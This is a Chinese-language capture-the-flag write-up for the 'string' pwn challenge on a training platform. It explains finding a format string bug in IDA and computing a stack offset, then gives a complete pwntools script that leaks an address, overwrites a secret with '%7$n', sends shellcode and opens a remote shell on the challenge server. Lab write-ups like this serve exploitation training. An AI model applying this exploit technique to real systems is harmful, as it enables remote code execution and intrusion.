攻防世界STRing

攻防世界PWN

String的WP

基本的三步checksec，file，执行文件

这是一个64位文件，只有pIE没开。

由string这个题目猜测可能会是字符串漏洞

将下载好的附件扔进IDA里查看，点击main函数

main函数中找不到，那就在其他函数看一下。
点击 sub_400D72

要进入if条件中，输入的s的长度需小于12位
在sub_400BB9函数中看到了

printf前几句中存在%s与%ld，可以操作.
继续看下一个函数

(a1+4是指a1加4个字节，也就是一个整数类型所以这个就是a1[1]）
之后发现巫师的分支有命令执行的语句，可以直接执行外部输入的命令，而条件是a1这个数组里面的第一个数字等于第二个数字，可以在main函数中发现a1就是V5就是V4，则a1[0]=68，a1[1]=85.
printf(“secret[0] is %x\n”, v5, a2);
printf(“secret[1] is %x\n”, v5 + 4);
main函数的这两句话中，表示出来a1[0]和a1[1]的地址。
所以我们可以通过格式化字符串漏洞，改写a1[0]的值.
然后再次运行程序，计算偏移量。
AAAA.15f9e723.0.15ecdf33.d.ffffff80.0.0.41414141.252e7825.2e78252eI hear it, I hear it…
得出偏移量是7
得出EXP
from pwn import *
#r = process（"./文件名")
r = remote(‘111.200.241.244’,63157)
r.recvuntil(“secret[0] is “)
#使接收到的数据倒序并转化为16进制赋给a1_addr
a1_addr = int(r.recvuntil(”\n”)[:-1], 16)
print(a1_addr)
#进入 sub_400D72函数
r.recvuntil(“What should your character’s name be:\n”)
r.sendline(“wang”)
#进入sub_400A7D函数
r.recvuntil(“So, where you will go?east or up?:\n”)
r.sendline(“east”)
#进入sub_400BB9函数
r.recvuntil(“go into there(1), or leave(0)?:\n”)
r.sendline(“1”)
r.recvuntil("‘Give me an address’\n")
r.sendline(str(a1_addr))
r.recvuntil(“And, you wish is:\n”)
payload = ‘A’ * 85 + “%7$n”
r.sendline(payload)
shellcode = asm(shellcraft.sh())
r.sendline(shellcode)
r.interactive()

成功Get shell